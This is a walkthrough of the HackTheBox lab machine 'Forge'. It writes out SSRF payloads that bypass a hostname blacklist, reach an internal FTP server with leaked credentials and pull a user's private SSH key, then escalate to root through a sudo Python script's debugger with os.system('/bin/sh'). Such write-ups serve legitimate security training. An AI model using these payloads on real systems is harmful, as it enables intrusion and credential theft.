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Forge HackTheBox Walkthrough

Introduction

Forge is a CTF Linux box rated “medium” on the difficulty scale on the HackTheBox platform. The box covers subdomain enumeration, SSRF attacks and basic reverse engineering of a python script for privilege escalation.

Table of Content

Network Scanning

  • Nmap

Enumeration

  • Subdomain enumeration using wfuzz
  • Checking file upload filters on web application

Exploitation

  • Exploiting SSRF to read private SSH key
  • Logging in using this SSH key

Privilege Escalation

  • Understanding python script running as sudo
  • Gaining root by exploiting pdb

Let’s deep dive into this.

Network Scanning

The dedicated IP address of the machine is 10.129.164.116. We’ll run a nmap scan on this machine’s IP. As we can see in the nmap scan, the server tried to redirect the request to http://forge.htb. So, we’ll add this IP in our hosts file and access the webserver.

nmap -sV -sC -p 1-1000 10.129.164.116

Now, we access the webserver which seemed to be running a digital gallery.

Enumeration

As we see there was an upload function in the gallery. We tried uploading a PHP payload and gaining reverse shell but it didn’t work. The file was being uploaded to the server though and contents were there but it wasn’t executing the code.

However, since the website was rerouting to forge.htb, it was possible that there were other subdomains on the website. We used wfuzz for this bruteforce (along with seclists wordlist).

wfuzz -w /home/kali/seclists/Discovery/DNS/subdomains-top1million-5000.txt -H "Host: FUZZ.forge.htb" --sc 200 10.129.164.116

This shows that admin.forge.htb exists.

However, upon opening the URL using curl we received an error. This means that an access control filter is up on the server.

echo "10.129.164.116   admin.forge.htb" >> /etc/hosts
curl http://admin.forge.htb/

So, we headed to another upload option “upload from URL.” There was another filter that only allowed HTTP,HTTPS URLs.

So, I set up a listener on port 80 using netcat and input http://10.10.16.10/shell.php in the option (my HTB tunnel IP).

On my netcat listener, I could see the website trying to fetch shell.php. There were a few notable things here:

  • The server tried to fetch the specified file shell.php from my IP
  • The request had my IP in the Host header
  • User-Agent is python-requests which is a python crawler

Exploitation

Now that it had been established the server tries to fetch a remote file, we can work our way up to exploitation from here. My first instinct was to access admin.forge.htb using this remote URL functionality as that page was only accessible using localhost. So, I was able to do that like this but encountered yet another problem!

So, this address is blacklisted. Let’s see if we can bypass this by typing the subdomain “admin” in all caps (ADMIN.forge.htb). Well, well looks like we are able to access admin.forge.htb now! This vulnerability is called SSRF (server-side request forgery) where an attacker is able to tamper with the backend requests on a server and breakthrough various access controls (like localhost here) to access sensitive files or even gain a remote shell.

This told me about a page /announcements which I then tried to access using http://ADMIN.forge.htb/announcements but this was also blacklisted. So, I used this payload:

http://ADMIN.FORGE.htb/announcements
curl http://forge.htb/uploads/ps14SjF8useIEk0VOao1

Important things inferred from this result were:

  • Internal FTP server is running whose credentials are user:heightofsecurity123!
  • Upload file option supports FTP and FTPS
  • ?u= can be used to upload an image on /uploads page.

So, if the /upload engine supports inclusion through the URL and FTP protocol, we can exploit SSRF and access the internal FTP server! The payload I used was

http://ADMIN.FORGE.htb/upload?u=ftp://user:heightofsecurity123!@127.0.1.1/

Now, if I can access user.txt, I might also be able to access the private SSH key. I did that using this payload:

http://ADMIN.FORGE.htb/upload?u=ftp://user:heightofsecurity123!@127.0.1.1/.ssh/id_rsa

Saving that key in my local system we can log into the victim box.

nano id_rsa
chmod 600 id_rsa
ssh -i id_rsa user@forge.htb

Privilege Escalation

Now that we had a stable prompt we could advance for privilege escalation. I checked the sudoers file which had a python script allowed to run as root. This script opens up a listener for remote clients to connect. Also, it compares the input password with hardcoded credential secretadminpassword

sudo -l
cat /opt/remote-manage.py

Let’s do that and login to this user again from another terminal and connect to the script using netcat.

sudo /usr/bin/python3 /opt/remote-manage.py
nc localhost 55465

Now, I am effectively communicating with a python script that is run as root. You will notice that this script is flawed. As soon as I input anything other than “secretadminpassword” it throws an exception and opens up Python Debugger.

Now, we have a Python debugger (pdb) running as root with us! Super convenient. We would have used a buffer overflow attack if this flaw didn’t exist to get into the debugger. Anyway, we can use the debugger to perform any function as root. I used the technique used by gtfobins here. Simply invoked a shell using the os module. And this is how we root this box.

import os;os.system(“/bin/sh”)
id
cat /root/root.txt

Conclusion

The box covers a few tricks that make one scratch their brain, however, it doesn’t have any rabbit holes or advanced techniques used to exploit. We covered subdomain enumeration, SSRF and basic Python reverse engineering in this box. Hope you liked this article. Thanks for reading.

Author: Harshit Rajpal is an InfoSec researcher and left and right brain thinker. Contact here